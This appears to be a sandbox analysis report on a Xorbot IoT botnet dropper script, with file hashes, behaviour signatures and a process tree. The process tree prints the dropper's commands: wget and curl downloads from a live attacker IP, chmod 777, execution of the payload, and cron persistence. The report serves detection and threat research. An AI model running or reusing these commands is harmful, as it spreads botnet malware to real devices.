Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    139s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    30-11-2024 18:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    ec0ffe14fe481a8c4f08e2dd622a8fb3

  • SHA1

    966e9859553fbe5400c8eba0f02018b78f434149

  • SHA256

    6f8f9e04cd9bc383e8a1c96b8b0c648aedc109e7783fb213532c4ce4ff1622e6

  • SHA512

    73a6817a4345934e3d0ccb4e464d1270255fa4cfc0dd70797f97e0145e2a9b02c2bb68443fd3d29f6caaa50d391ede9391e360bce3990576ce084d9c06ef376a

  • SSDEEP

    96:cNpnbyyvRn3n6epNYYWBl+bTX7WzWHW3WsWEWAeTDHeTDHwWzWHW3WsWEWVQyYnR:cNpnbyyvTRbTX6jjNpnbyyXB

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1485
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1488
        • /usr/bin/wget
          wget http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
          2⤵
          • Writes file to tmp directory
          PID:1489
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
          2⤵
          • Writes file to tmp directory
          PID:1500
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
          2⤵
          • Writes file to tmp directory
          PID:1501
        • /bin/chmod
          chmod 777 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
          2⤵
          • File and Directory Permissions Modification
          PID:1502
        • /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
          ./4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:1503
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:1505
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:1506
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:1507
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:1508
              • /bin/rm
                rm 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
                2⤵
                  PID:1517
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb
                  2⤵
                    PID:1520

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI
                  Filesize

                  98KB

                  MD5

                  5141342d0df8699fa32a6b066a0c592e

                  SHA1

                  8157673225bd5182f16215e2aa823a25ca2d4fbc

                  SHA256

                  54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                  SHA512

                  d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                  Download Submit

                • /var/spool/cron/crontabs/tmp.jIEAjz
                  Filesize

                  210B

                  MD5

                  d1bb77c9f69ce172be0d41366f67c75e

                  SHA1

                  e49f478755ada5c272e9bbbb087af42a88aa944a

                  SHA256

                  a56cc5a9a776a65c41d1706685a30cc2feb7d7e4be7371f4fd399e7eff66596c

                  SHA512

                  793742c979bfb313f6314f5392126230ceef5bf0546a957924516d4d2418b649f2761b7a2d549690be5006a27710c3833fd293a12bdc82e4a2eea5248ff54838

                  Download Submit